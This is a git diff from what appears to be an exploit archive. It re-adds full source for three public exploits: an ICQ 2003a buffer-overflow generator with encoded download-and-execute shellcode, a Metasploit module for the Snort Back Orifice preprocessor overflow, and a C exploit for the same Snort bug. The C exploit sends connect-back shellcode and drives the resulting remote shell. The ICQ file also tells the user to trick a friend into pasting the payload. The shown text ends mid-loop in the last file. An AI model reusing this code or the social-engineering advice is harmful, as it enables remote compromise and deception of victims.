-* ICQ 2002a Build #3728 on Win XP Pro Sp2
-*
-*/
-
-
-#include 
-#include 
-#include 
-
-char *Sifrele(char *pszName1)
-{
-       char *pszName = pszName1;
-       int Xor = 0x1d;
-       int Size = strlen(pszName);
-       for(int i=0;i\n");
-               printf(" Example:icq_bof http://www.atmacasoft.com/small.exe\n");
-
-               return;
-       }
-
-       /* Generic win32 http download shellcode
-       xored with 0x1d by delikon (http://delikon.de/) */
-       char shellcode[] = "\xEB"
-       "\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
-       "\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
-       "\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
-       "\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
-       "\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
-       "\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
-       "\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
-       "\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
-       "\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
-       "\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
-       "\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
-       "\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
-       "\x78\x65\x78\x1D";
-
-       FILE *file;
-
-       char buf[485];
-       char *web;
-       short int weblength;
-       char *pointer = NULL;
-       char *newshellcode;
-
-       web = argv[1];
-       weblength = (short int)0xff22;
-       pointer = strstr(shellcode,"\x22\xff");
-       weblength -= strlen(web)+1;
-       memcpy(pointer,&weblength,2);
-       newshellcode = (char*)malloc(sizeof(shellcode)+strlen(web)+1);
-       strcpy(newshellcode,shellcode);
-       strcat(newshellcode,Sifrele(web));
-       strcat(newshellcode,"\x1d");
-
-       if( (file = fopen("bof.txt", "w+")) == NULL )
-               return;
-
-       memset(buf, 0x90, 480);
-
-       //ret - icqate32.dll (5.3.4.3727) jmp esp addr - [Universal]
-       *(DWORD *) &buf[34]  = 0x12025c5c;
-       memcpy(buf+34+32,newshellcode,strlen(newshellcode));
-       *(DWORD *) &buf[480]  = 0x00000000;
-
-       fprintf(file, "%s", buf);
-       fclose(file);
-
-       printf("\r\nbof.txt has been generated!\r\n");
-
-       return;
-}
-
-// milw0rm.com [2005-10-29]
+/*
+*
+* Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit
+* Bug discovered & exploit coded by ATmaCA
+* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
+* E-Mail: atmaca@icqmail.com
+* Credit to Kozan and delicon
+*
+*/
+
+/*
+* Usage:
+*
+* Execute exploit, it will create "bof.txt" in current directory.
+* Open ICQ <= 2003a and click "Add" button
+* "Add / Invite Users to Your Contact List" dialog will be opened
+* Copy the content of "bof.txt" to "First name" and "Last name" fields.
+* Press "find" button
+*
+* Now, icq will download and run your server which you specified in WebUrl field.
+*
+* This exploit requires social engineering skills to use it. For example you should
+* tell your friend that you've found a easter-egg and if he wants to see it he has to
+* type your vuln. string to first and last name fields in icq then press find button etc...
+*
+
+/*
+*
+* Affected versions:
+* Mirabilis ICQ Pro 2003a and prior versions.
+*
+* Tested with :
+* ICQ 2003a Build #3800 on Win XP Pro Sp2
+* ICQ 2002a Build #3728 on Win XP Pro Sp2
+*
+*/
+
+
+#include 
+#include 
+#include 
+
+char *Sifrele(char *pszName1)
+{
+       char *pszName = pszName1;
+       int Xor = 0x1d;
+       int Size = strlen(pszName);
+       for(int i=0;i\n");
+               printf(" Example:icq_bof http://www.atmacasoft.com/small.exe\n");
+
+               return;
+       }
+
+       /* Generic win32 http download shellcode
+       xored with 0x1d by delikon (http://delikon.de/) */
+       char shellcode[] = "\xEB"
+       "\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
+       "\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
+       "\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
+       "\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
+       "\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
+       "\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
+       "\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
+       "\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
+       "\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
+       "\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
+       "\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
+       "\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
+       "\x78\x65\x78\x1D";
+
+       FILE *file;
+
+       char buf[485];
+       char *web;
+       short int weblength;
+       char *pointer = NULL;
+       char *newshellcode;
+
+       web = argv[1];
+       weblength = (short int)0xff22;
+       pointer = strstr(shellcode,"\x22\xff");
+       weblength -= strlen(web)+1;
+       memcpy(pointer,&weblength,2);
+       newshellcode = (char*)malloc(sizeof(shellcode)+strlen(web)+1);
+       strcpy(newshellcode,shellcode);
+       strcat(newshellcode,Sifrele(web));
+       strcat(newshellcode,"\x1d");
+
+       if( (file = fopen("bof.txt", "w+")) == NULL )
+               return;
+
+       memset(buf, 0x90, 480);
+
+       //ret - icqate32.dll (5.3.4.3727) jmp esp addr - [Universal]
+       *(DWORD *) &buf[34]  = 0x12025c5c;
+       memcpy(buf+34+32,newshellcode,strlen(newshellcode));
+       *(DWORD *) &buf[480]  = 0x00000000;
+
+       fprintf(file, "%s", buf);
+       fclose(file);
+
+       printf("\r\nbof.txt has been generated!\r\n");
+
+       return;
+}
+
+// milw0rm.com [2005-10-29]
diff --git a/platforms/windows/remote/1279.pm b/platforms/windows/remote/1279.pm
index 686bbd74e..68ab0820d 100755
--- a/platforms/windows/remote/1279.pm
+++ b/platforms/windows/remote/1279.pm
@@ -1,132 +1,132 @@
-###############################################################
-# for educational purpose only
-# by Kira < trir00t [at] gmail.com >
-###############################################################
-package Msf::Exploit::snort_bo_overflow_win32;
-use base 'Msf::Exploit';
-use strict;
-use Pex::Text;
-
-my $holdrand;
-my $advanced = {};
-
-my $info = 
-{
-	'Name' => 'Snort Back Orifice Preprocessor Overflow',
-	'Version' => '$Revision: 1.0 $',
-	'Authors' => [ 'Trirat Puttaraksa (Kira) ', ],
-	'Arch' => ['x86'],
-	'OS' => ['win32', 'win2000', 'winxp', 'win2003'],
-	'Priv' => 1,
-	'UserOpts' => {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 53],
-	},
-
-	'Payload' => {
-		'Space' => 1024, # you can use more spaces
-		'BadChars' => "\x00",
-	},
-
-	'Description' => Pex::Text::Freeform(qq{
-		This exploits the buffer overflow in Snort version 
-		2.4.0 to 2.4.2. This particular module is capable of
-		exploiting the bug on x86 Win32, Win2000, WinXP and Win2003. 
-		Exploitation in this vulnerability is depend on many factors. 
-		Difference in GCC version, compiled option and 
-		operating system made diffent technique in exploitation.
-	}),
-
-	'Refs' => [
-		['URL ', "http://www.securityfocus.com/bid/15131"],
-	],	
-	
-	'Targets' => [
-
-	["Snort 2.4.2 Binary on Windows XP Professional SP1", 0x77da54d4,
-		(18+1024+1028+1024)],
-	["Snort 2.4.2 Binary on Windows XP Professional SP2", 0x77daacdb, 
-		(18+1024+1028+1024)],
-	["Snort 2.4.2 Binary on Windows Server 2003 SP1", 0x7d065177, 
-		(18+1024+1028+1024)],
-	["Snort 2.4.2 Binary on Windows Server 2000 SP0", 0x77e33f69,
-		(18+1024+1028+1024)],
-	["Snort 2.4.2 Binary on Windows 2000 Professional SP0", 0x7850cdef,
-		(18+1024+1028+1024)],
-	],
-
-	'Keys' => ['Snort'],
-};
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return ($self);
-}
-
-sub Exploit {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx = $self->GetVar('TARGET');
-	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
-
-	my $target = $self->Targets->[$target_idx];
-
-	if(! $self->InitNops(128)) {
-		$self->PrintLine("[*] Failed to initialize the NOP module.");
-		return;
-	}
-
-	my $socket = Msf::Socket::Udp->new
-		(
-			'PeerAddr' => $target_host,
-			'PeerPort' => $target_port,
-			'LocalPort' => $self->GetVar('CPORT'),
-		);
-
-	if($self->IsError) {
-		$self->PrintLine("[*] Error creating socket: " . 
-						$socket->GetError);
-	}
-
-	$self->PrintLine(sprintf("[*] Trying " . $target->[0] . " using return address 0x%.8x....", $target->[1]));
-
-	my $payload = "*!*QWTY?";		# Magic string: 8 bytes
-	$payload .= pack('V', $target->[2]);	# Len: 4 bytes
-	$payload .= "\xed\xac\xef\x0d";		# UDP packet id
-	$payload .= "\x01";			# BO type (PING)
-	$payload .= "\x90" x 1024;		# Data
-	$payload .= "\x90" x 1024;		# offset to EIP
-	$payload .= pack('V', $target->[1]);	# return address
-	$payload .= $shellcode;			# our shellcode
-
-	$payload = bocrypt($payload);		# encrypted payload
-
-	$self->PrintLine("[*] Sending Exploit....");
-	$socket->Send($payload);
-}
-
-sub bocrypt {
-	my $tmppayload = shift;
-	my @arrpayload = split(//, $tmppayload);
-	my $retpayload;
-	my $c;
-	
-	msrand(31337);
-
-	foreach $c (@arrpayload) {
-		$retpayload .= chr((ord($c) ^ (mrand()%256)));
-	}
-	return ($retpayload);
-}
-
-sub msrand {
-	$holdrand = shift;
-}
-
-sub mrand {
-	return ((($holdrand = ($holdrand * 214013 + 2531011 & 0xffffffff)) >> 16) & 0x7fff);
-}
-
-# milw0rm.com [2005-11-01]
+###############################################################
+# for educational purpose only
+# by Kira < trir00t [at] gmail.com >
+###############################################################
+package Msf::Exploit::snort_bo_overflow_win32;
+use base 'Msf::Exploit';
+use strict;
+use Pex::Text;
+
+my $holdrand;
+my $advanced = {};
+
+my $info = 
+{
+	'Name' => 'Snort Back Orifice Preprocessor Overflow',
+	'Version' => '$Revision: 1.0 $',
+	'Authors' => [ 'Trirat Puttaraksa (Kira) ', ],
+	'Arch' => ['x86'],
+	'OS' => ['win32', 'win2000', 'winxp', 'win2003'],
+	'Priv' => 1,
+	'UserOpts' => {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 53],
+	},
+
+	'Payload' => {
+		'Space' => 1024, # you can use more spaces
+		'BadChars' => "\x00",
+	},
+
+	'Description' => Pex::Text::Freeform(qq{
+		This exploits the buffer overflow in Snort version 
+		2.4.0 to 2.4.2. This particular module is capable of
+		exploiting the bug on x86 Win32, Win2000, WinXP and Win2003. 
+		Exploitation in this vulnerability is depend on many factors. 
+		Difference in GCC version, compiled option and 
+		operating system made diffent technique in exploitation.
+	}),
+
+	'Refs' => [
+		['URL ', "http://www.securityfocus.com/bid/15131"],
+	],	
+	
+	'Targets' => [
+
+	["Snort 2.4.2 Binary on Windows XP Professional SP1", 0x77da54d4,
+		(18+1024+1028+1024)],
+	["Snort 2.4.2 Binary on Windows XP Professional SP2", 0x77daacdb, 
+		(18+1024+1028+1024)],
+	["Snort 2.4.2 Binary on Windows Server 2003 SP1", 0x7d065177, 
+		(18+1024+1028+1024)],
+	["Snort 2.4.2 Binary on Windows Server 2000 SP0", 0x77e33f69,
+		(18+1024+1028+1024)],
+	["Snort 2.4.2 Binary on Windows 2000 Professional SP0", 0x7850cdef,
+		(18+1024+1028+1024)],
+	],
+
+	'Keys' => ['Snort'],
+};
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return ($self);
+}
+
+sub Exploit {
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx = $self->GetVar('TARGET');
+	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+
+	my $target = $self->Targets->[$target_idx];
+
+	if(! $self->InitNops(128)) {
+		$self->PrintLine("[*] Failed to initialize the NOP module.");
+		return;
+	}
+
+	my $socket = Msf::Socket::Udp->new
+		(
+			'PeerAddr' => $target_host,
+			'PeerPort' => $target_port,
+			'LocalPort' => $self->GetVar('CPORT'),
+		);
+
+	if($self->IsError) {
+		$self->PrintLine("[*] Error creating socket: " . 
+						$socket->GetError);
+	}
+
+	$self->PrintLine(sprintf("[*] Trying " . $target->[0] . " using return address 0x%.8x....", $target->[1]));
+
+	my $payload = "*!*QWTY?";		# Magic string: 8 bytes
+	$payload .= pack('V', $target->[2]);	# Len: 4 bytes
+	$payload .= "\xed\xac\xef\x0d";		# UDP packet id
+	$payload .= "\x01";			# BO type (PING)
+	$payload .= "\x90" x 1024;		# Data
+	$payload .= "\x90" x 1024;		# offset to EIP
+	$payload .= pack('V', $target->[1]);	# return address
+	$payload .= $shellcode;			# our shellcode
+
+	$payload = bocrypt($payload);		# encrypted payload
+
+	$self->PrintLine("[*] Sending Exploit....");
+	$socket->Send($payload);
+}
+
+sub bocrypt {
+	my $tmppayload = shift;
+	my @arrpayload = split(//, $tmppayload);
+	my $retpayload;
+	my $c;
+	
+	msrand(31337);
+
+	foreach $c (@arrpayload) {
+		$retpayload .= chr((ord($c) ^ (mrand()%256)));
+	}
+	return ($retpayload);
+}
+
+sub msrand {
+	$holdrand = shift;
+}
+
+sub mrand {
+	return ((($holdrand = ($holdrand * 214013 + 2531011 & 0xffffffff)) >> 16) & 0x7fff);
+}
+
+# milw0rm.com [2005-11-01]
diff --git a/platforms/windows/remote/130.c b/platforms/windows/remote/130.c
index c6d1e716e..16cea7f5f 100755
--- a/platforms/windows/remote/130.c
+++ b/platforms/windows/remote/130.c
@@ -324,6 +324,6 @@ int main(int argc,char *argv[])
 	return 0;
 }
 
-
-
-// milw0rm.com [2003-12-04]
+
+
+// milw0rm.com [2003-12-04]
diff --git a/platforms/windows/remote/1313.c b/platforms/windows/remote/1313.c
index c7d33015a..3ba01225a 100755
--- a/platforms/windows/remote/1313.c
+++ b/platforms/windows/remote/1313.c
@@ -1,261 +1,261 @@
-/*
- * snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
- *  
- *              by Russell Sanford (xort@tty64.org)
- *                  -> www.code-junkies.net <-
- *
- *        Date: Nov 11, 2005
- *
- * Discription: A buffer overflow exist in the snort pre-preprocessor
- *		designed to detect encrypted Back Orifice ping packets
- *		on a network. The overflow occurs as a result of a field 
- *	 	size read directly from the data within that packet
- *	 	inwhich	an attacker can specify.
- *
- *	Credit: ISS XFORCE (great work as always)
- *
- * Information: CERT TA05-291A
- *
- *     Respect: Pull The Plug & DARPA Net Communities
- *
- */
-
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-
-#define buffsize 1056
-#define COOKIE   "*!*QWTY?"
-
-typedef struct {
-	char   magic[8];
-	int         len;
-	int          id;
-	char       type;
-	char data[buffsize];
-	char        crc;
-} BOHEADER;
-
-char        buffer[buffsize+5000];
-static long              holdrand = 31337L;
-unsigned int          ret_address = 0xbfffebad;
-
-// 90 byte Connect Back shellcode. Connects Back to Port 21 to givin IP
-char shellcode[] =
-"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68"
-"\x45\xc4\x34\x1e" // IP-A
-"\x81\x04\x24"
-"\x01\x01\x01\x01" // IP-B 
-"\x68\x01\xff\xfe\x13\x81\x04\x24\x01\x01\x01\x01\x6a\x10\x51\x50\x89\xe1\xb0"
-"\x66\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0"
-"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0"
-"\x0b\xcd\x80\xeb\xfe";
-
-int mrand (void) {
-       	return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
-}
-
-void timeout(int sig_num) { 
-	printf(" [-] Listen() for connect back shellcode timed out. Exploit Failed!\n");
-	exit(1);
-}
-
-int main(int argc, char **argv) {
-
-	signal(SIGALRM,timeout);	
-
-	int s, z, i, len_inet, IP_a, IP_b, l, sent;
-	char *server_addr=argv[1];
-	char  *local_addr=argv[2];
-	char     buf[512];
-	struct sockaddr_in adr_srvr, adr, loc_adr;
-        fd_set  rfds, wfds;
-
-	printf("\n\t,------------------------------------------------------------,\n"
-	         "\t| Snort 2.4.0-2.4.2 Back Orifice Preprocessor Remote Exploit |\n"
-	         "\t|           by Russell Sanford - xort@tty64.org              |\n"
-	         "\t`------------------------------------------------------------`\n\n");
-
-	/* 
-	 * Check for Valid Input
-	 */
-	
-	if (argc < 3) {
-		printf("usage: ./snortxp TARGET-IP CONNECT-BACK-IP\n\n");
-		
-		exit(1);
-	}	
-
-	/*
-	 * Fix up Safe Values for connect back shellcode 
-	 */
-	
-	IP_a = inet_addr(argv[2]);
-	IP_b = 0;
-
-	printf(" [x] Patching Shellcode to Connect back to %s.\n",argv[2]);
-
-	do {
-		IP_a -= 0x01010101;	IP_b += 0x01010101;
-	}
-	while (  ((IP_a & 0x000000ff) == 0) || 
-                 ((IP_a & 0x0000ff00) == 0) || 
-		 ((IP_a & 0x00ff0000) == 0) ||
-		 ((IP_a & 0xff000000) == 0) );
-
-	*(int *)&shellcode[19] = IP_a;
-	*(int *)&shellcode[26] = IP_b;
-
-	/*
-	 * Create And Fill In Header Info
-	 */
-
-	printf(" [x] Creating Evil Packet.\n");
-
-	BOHEADER evil_packet;
-
-	memcpy(evil_packet.magic,COOKIE,8); 
-	evil_packet.len  =  (buffsize+38); //1094
-	evil_packet.id   = 0xbadc0ded;
-        memset(evil_packet.data, 0x90, buffsize);
-	memcpy(&evil_packet.data[buffsize-300],shellcode,90);
-	evil_packet.type = 0x1;
-	evil_packet.crc  = 0x43;
-
-	printf(" [x] Using Return Address: 0x%.8x.\n",ret_address);
-
-	*(int *)&evil_packet.data[buffsize-4] = ret_address;
-
-	/*
-	 * Encrypt Evil Packet
-	 */
-
-	printf(" [x] Encrypting Packet.\n");
-
-	memcpy(buffer,&evil_packet,(18+buffsize));
-	for(i=0; i < (18+buffsize); i++) { buffer[i] = buffer[i] ^ (mrand()%256); }
-
-	/*
-	 * Set Up Socket To Send UDP Packet 
-	 */
-
-	printf(" [x] Preparing to Send Evil UDP Packet to %s.\n",argv[1]);
-		
-	memset(&adr_srvr,0,sizeof adr_srvr);
-	adr_srvr.sin_family = AF_INET;
-	adr_srvr.sin_port = htons(9000);
-	adr_srvr.sin_addr.s_addr = inet_addr(server_addr);
-	len_inet = sizeof adr_srvr;
-
-	s = socket(AF_INET,SOCK_DGRAM,0);
-	
-	if ( s == -1 ) {
-		printf(" [-] Failed to Create Socket. Exiting...\n");
-		exit(1);
-	}
-
-	/* 
-	 * Send Packet
-	 */
-
-	printf(" [x] Sending Packet.\n");
-
-	z = sendto(s,buffer,(18+buffsize),0,(struct sockaddr *)&adr_srvr, len_inet);
-
-	if ( z == -1 ) {
-		printf(" [-] Failed to Send Packet. Exiting...\n");
-		exit(1);
-	}
-
-	/*
-	 * Listen For Connect Back Shellcode
-	 */
-	 
-	 printf(" [x] Listening for Connect Back Shellcode.\n");
-
- 	 s = socket(AF_INET,SOCK_STREAM,0);
-
- 	 if ( s == -1 ) {
-		printf(" [-] Failed to Create Socket. Exiting...\n");
-		exit(1);
-	 }
-
-	 memset(&adr,0,sizeof adr);
-	 adr.sin_family = AF_INET;
-	 adr.sin_port = htons(21);
-	 adr.sin_addr.s_addr = INADDR_ANY;
-
-	 z = bind(s,(struct sockaddr *)&adr,sizeof(struct sockaddr));
-	
-	 if ( z == -1 ) {
-		printf(" [-] Failed to Bind Socket. Exiting...\n");
-		exit(1);
-	 }
-
-	 alarm(30);	// Set alarm so code can time out
-	 listen(s,4);
-
-	 int sin_size = sizeof(struct sockaddr_in);
-	 int new_fd = accept(s, (struct sockaddr *)&loc_adr,&sin_size);
-
-    	 alarm(0);	
-
-	 if (new_fd == -1 ) {
-		 printf(" [-] Failed to Accept Connection. Exiting...\n");
-		 exit(1);
-	 }
-
-	 printf(" [x] Connection Established! Exploit Successful.\n\n");
-
-         write(new_fd,"uname -a\nid\n",12);
-
-	 /*
-	  * Establish Connection. (ripped)
-	  */
-
-         while (1) {
-                FD_SET (0, &rfds);
-                FD_SET (new_fd, &rfds);
-                FD_SET (new_fd, &wfds);
-
-                select (new_fd + 1, &rfds, NULL, NULL, NULL);
-
-                if (FD_ISSET (0, &rfds)) {
-                        l = read (0, buf, sizeof (buf));
-                        if (l <= 0) {
-                                exit (EXIT_FAILURE);
-                        }
-                        sent=0;
-                        while (!sent) {
-                                select (new_fd+1, NULL, &wfds, NULL, NULL);
-                                if (FD_ISSET(new_fd, &wfds)) {
-                                        write(new_fd, buf, l);
-                                        sent=1;
-                                }
-                        }
-                }
-
-                if (FD_ISSET (new_fd, &rfds)) {
-                        l = read (new_fd, buf, sizeof (buf));
-                        if (l == 0) {
-                                fprintf(stdout,"\n [x] Connection Closed By Remote Host.\n");
-                                exit (EXIT_FAILURE);
-                        } else if (l < 0) {
-                                exit (EXIT_FAILURE);
-                        }
-                        write (1, buf, l);
-                }
-        }
-
-	return 0;
-}
-
-// milw0rm.com [2005-11-11]
+/*
+ * snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
+ *  
+ *              by Russell Sanford (xort@tty64.org)
+ *                  -> www.code-junkies.net <-
+ *
+ *        Date: Nov 11, 2005
+ *
+ * Discription: A buffer overflow exist in the snort pre-preprocessor
+ *		designed to detect encrypted Back Orifice ping packets
+ *		on a network. The overflow occurs as a result of a field 
+ *	 	size read directly from the data within that packet
+ *	 	inwhich	an attacker can specify.
+ *
+ *	Credit: ISS XFORCE (great work as always)
+ *
+ * Information: CERT TA05-291A
+ *
+ *     Respect: Pull The Plug & DARPA Net Communities
+ *
+ */
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#define buffsize 1056
+#define COOKIE   "*!*QWTY?"
+
+typedef struct {
+	char   magic[8];
+	int         len;
+	int          id;
+	char       type;
+	char data[buffsize];
+	char        crc;
+} BOHEADER;
+
+char        buffer[buffsize+5000];
+static long              holdrand = 31337L;
+unsigned int          ret_address = 0xbfffebad;
+
+// 90 byte Connect Back shellcode. Connects Back to Port 21 to givin IP
+char shellcode[] =
+"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68"
+"\x45\xc4\x34\x1e" // IP-A
+"\x81\x04\x24"
+"\x01\x01\x01\x01" // IP-B 
+"\x68\x01\xff\xfe\x13\x81\x04\x24\x01\x01\x01\x01\x6a\x10\x51\x50\x89\xe1\xb0"
+"\x66\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0"
+"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0"
+"\x0b\xcd\x80\xeb\xfe";
+
+int mrand (void) {
+       	return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
+}
+
+void timeout(int sig_num) { 
+	printf(" [-] Listen() for connect back shellcode timed out. Exploit Failed!\n");
+	exit(1);
+}
+
+int main(int argc, char **argv) {
+
+	signal(SIGALRM,timeout);	
+
+	int s, z, i, len_inet, IP_a, IP_b, l, sent;
+	char *server_addr=argv[1];
+	char  *local_addr=argv[2];
+	char     buf[512];
+	struct sockaddr_in adr_srvr, adr, loc_adr;
+        fd_set  rfds, wfds;
+
+	printf("\n\t,------------------------------------------------------------,\n"
+	         "\t| Snort 2.4.0-2.4.2 Back Orifice Preprocessor Remote Exploit |\n"
+	         "\t|           by Russell Sanford - xort@tty64.org              |\n"
+	         "\t`------------------------------------------------------------`\n\n");
+
+	/* 
+	 * Check for Valid Input
+	 */
+	
+	if (argc < 3) {
+		printf("usage: ./snortxp TARGET-IP CONNECT-BACK-IP\n\n");
+		
+		exit(1);
+	}	
+
+	/*
+	 * Fix up Safe Values for connect back shellcode 
+	 */
+	
+	IP_a = inet_addr(argv[2]);
+	IP_b = 0;
+
+	printf(" [x] Patching Shellcode to Connect back to %s.\n",argv[2]);
+
+	do {
+		IP_a -= 0x01010101;	IP_b += 0x01010101;
+	}
+	while (  ((IP_a & 0x000000ff) == 0) || 
+                 ((IP_a & 0x0000ff00) == 0) || 
+		 ((IP_a & 0x00ff0000) == 0) ||
+		 ((IP_a & 0xff000000) == 0) );
+
+	*(int *)&shellcode[19] = IP_a;
+	*(int *)&shellcode[26] = IP_b;
+
+	/*
+	 * Create And Fill In Header Info
+	 */
+
+	printf(" [x] Creating Evil Packet.\n");
+
+	BOHEADER evil_packet;
+
+	memcpy(evil_packet.magic,COOKIE,8); 
+	evil_packet.len  =  (buffsize+38); //1094
+	evil_packet.id   = 0xbadc0ded;
+        memset(evil_packet.data, 0x90, buffsize);
+	memcpy(&evil_packet.data[buffsize-300],shellcode,90);
+	evil_packet.type = 0x1;
+	evil_packet.crc  = 0x43;
+
+	printf(" [x] Using Return Address: 0x%.8x.\n",ret_address);
+
+	*(int *)&evil_packet.data[buffsize-4] = ret_address;
+
+	/*
+	 * Encrypt Evil Packet
+	 */
+
+	printf(" [x] Encrypting Packet.\n");
+
+	memcpy(buffer,&evil_packet,(18+buffsize));
+	for(i=0; i < (18+buffsize); i++) { buffer[i] = buffer[i] ^ (mrand()%256); }
+
+	/*
+	 * Set Up Socket To Send UDP Packet 
+	 */
+
+	printf(" [x] Preparing to Send Evil UDP Packet to %s.\n",argv[1]);
+		
+	memset(&adr_srvr,0,sizeof adr_srvr);
+	adr_srvr.sin_family = AF_INET;
+	adr_srvr.sin_port = htons(9000);
+	adr_srvr.sin_addr.s_addr = inet_addr(server_addr);
+	len_inet = sizeof adr_srvr;
+
+	s = socket(AF_INET,SOCK_DGRAM,0);
+	
+	if ( s == -1 ) {
+		printf(" [-] Failed to Create Socket. Exiting...\n");
+		exit(1);
+	}
+
+	/* 
+	 * Send Packet
+	 */
+
+	printf(" [x] Sending Packet.\n");
+
+	z = sendto(s,buffer,(18+buffsize),0,(struct sockaddr *)&adr_srvr, len_inet);
+
+	if ( z == -1 ) {
+		printf(" [-] Failed to Send Packet. Exiting...\n");
+		exit(1);
+	}
+
+	/*
+	 * Listen For Connect Back Shellcode
+	 */
+	 
+	 printf(" [x] Listening for Connect Back Shellcode.\n");
+
+ 	 s = socket(AF_INET,SOCK_STREAM,0);
+
+ 	 if ( s == -1 ) {
+		printf(" [-] Failed to Create Socket. Exiting...\n");
+		exit(1);
+	 }
+
+	 memset(&adr,0,sizeof adr);
+	 adr.sin_family = AF_INET;
+	 adr.sin_port = htons(21);
+	 adr.sin_addr.s_addr = INADDR_ANY;
+
+	 z = bind(s,(struct sockaddr *)&adr,sizeof(struct sockaddr));
+	
+	 if ( z == -1 ) {
+		printf(" [-] Failed to Bind Socket. Exiting...\n");
+		exit(1);
+	 }
+
+	 alarm(30);	// Set alarm so code can time out
+	 listen(s,4);
+
+	 int sin_size = sizeof(struct sockaddr_in);
+	 int new_fd = accept(s, (struct sockaddr *)&loc_adr,&sin_size);
+
+    	 alarm(0);	
+
+	 if (new_fd == -1 ) {
+		 printf(" [-] Failed to Accept Connection. Exiting...\n");
+		 exit(1);
+	 }
+
+	 printf(" [x] Connection Established! Exploit Successful.\n\n");
+
+         write(new_fd,"uname -a\nid\n",12);
+
+	 /*
+	  * Establish Connection. (ripped)
+	  */
+
+         while (1) {
